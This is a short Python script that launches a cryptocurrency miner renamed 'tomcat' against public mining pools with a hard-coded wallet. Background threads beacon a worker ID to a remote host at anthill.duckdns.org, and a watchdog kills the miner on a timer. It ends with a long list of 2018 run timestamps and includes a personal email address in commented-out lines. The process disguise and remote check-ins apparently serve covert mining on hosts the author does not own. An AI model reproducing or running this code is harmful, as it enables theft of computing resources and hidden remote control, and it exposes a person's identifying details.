import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:04.962683
#2018-02-17 15:54:04.813114
#2018-02-17 17:41:01.901401
#2018-02-17 19:28:05.573087
#2018-02-17 21:19:03.328192
#2018-02-17 23:03:03.985886
#2018-02-18 00:50:08.919300
#2018-02-18 02:38:07.683439
#2018-02-18 04:26:01.460304
#2018-02-18 06:17:06.131291
#2018-02-18 08:07:02.149090
#2018-02-18 09:53:07.904013
#2018-02-18 11:40:08.445724
#2018-02-18 13:27:01.633185
#2018-02-18 15:20:07.375209
#2018-02-18 17:09:05.444053
#2018-02-18 18:56:07.578437
#2018-02-18 20:43:01.522956
#2018-02-18 22:27:04.515604
#2018-02-19 00:16:01.728160
#2018-02-19 02:02:01.514290
#2018-02-19 03:49:07.255182
#2018-02-19 05:34:06.823465
#2018-02-19 07:22:03.227907
#2018-02-19 09:12:08.948259
#2018-02-19 11:01:07.415678
#2018-02-19 12:48:05.017776
#2018-02-19 14:35:07.346952
#2018-02-19 16:24:04.370811
#2018-02-19 18:11:06.036421
#2018-02-19 19:57:06.858399
#2018-02-19 21:47:05.463792
#2018-02-19 23:33:07.861701
#2018-02-20 01:18:07.059210
#2018-02-20 03:09:06.458561
#2018-02-20 04:57:06.519082
#2018-02-20 06:39:04.955113
#2018-02-20 08:24:05.983851
#2018-02-20 10:09:06.030773
#2018-02-20 11:53:07.012927
#2018-02-20 13:40:04.937047
#2018-02-20 15:24:01.282745
#2018-02-20 17:09:01.250304
#2018-02-20 18:57:07.940476
#2018-02-20 20:47:05.778057
#2018-02-20 22:30:09.612107
#2018-02-21 00:13:03.895451
#2018-02-21 01:58:08.006630
#2018-02-21 03:47:05.234809
#2018-02-21 05:36:07.627180
#2018-02-21 07:24:01.758339
#2018-02-21 09:08:06.787579
#2018-02-21 10:56:01.642163
#2018-02-21 12:43:04.097033
#2018-02-21 14:31:01.644095
#2018-02-21 16:18:02.051734
#2018-02-21 18:08:06.526781
#2018-02-21 19:54:01.959691
#2018-02-21 21:42:03.880539
#2018-02-21 23:29:06.170581
#2018-02-22 01:17:05.359856
#2018-02-22 03:08:06.172401
#2018-02-22 04:53:07.249051
#2018-02-22 06:38:03.696590
#2018-02-22 08:27:07.531951
#2018-02-22 10:14:01.511038
#2018-02-22 11:58:01.331367
#2018-02-22 13:43:06.261024
#2018-02-22 15:30:09.034926
#2018-02-22 17:16:02.086722
#2018-02-22 19:02:06.575795
#2018-02-22 20:52:05.286747
#2018-02-22 22:37:07.105860
#2018-02-23 00:26:07.699299
#2018-02-23 02:12:08.544000
#2018-02-23 03:56:04.591294
#2018-02-23 05:44:06.953534
#2018-02-23 07:33:01.249278
#2018-02-23 09:36:05.829188
#2018-02-23 11:40:10.416377
#2018-02-23 13:29:06.723336
#2018-02-23 15:16:02.109084
#2018-02-23 17:04:04.294911
#2018-02-23 18:53:01.925882
#2018-02-23 20:39:04.537185
#2018-02-23 22:26:03.638155
#2018-02-24 00:13:06.308506
#2018-02-24 02:04:03.872701
#2018-02-24 03:37:06.169659
#2018-02-24 05:10:08.203257
#2018-02-24 06:47:04.452962
#2018-02-24 08:20:01.475989
#2018-02-24 09:49:01.808161
#2018-02-24 11:33:04.074645
#2018-02-24 12:59:05.861578
#2018-02-24 14:33:05.508920
#2018-02-24 16:03:01.908046
#2018-02-24 17:44:06.780256
#2018-02-24 19:16:03.553087
#2018-02-24 20:49:06.471622
#2018-02-24 22:37:05.915626
#2018-02-25 01:05:08.246295
#2018-02-25 04:33:01.546470
#2018-02-25 07:59:06.094182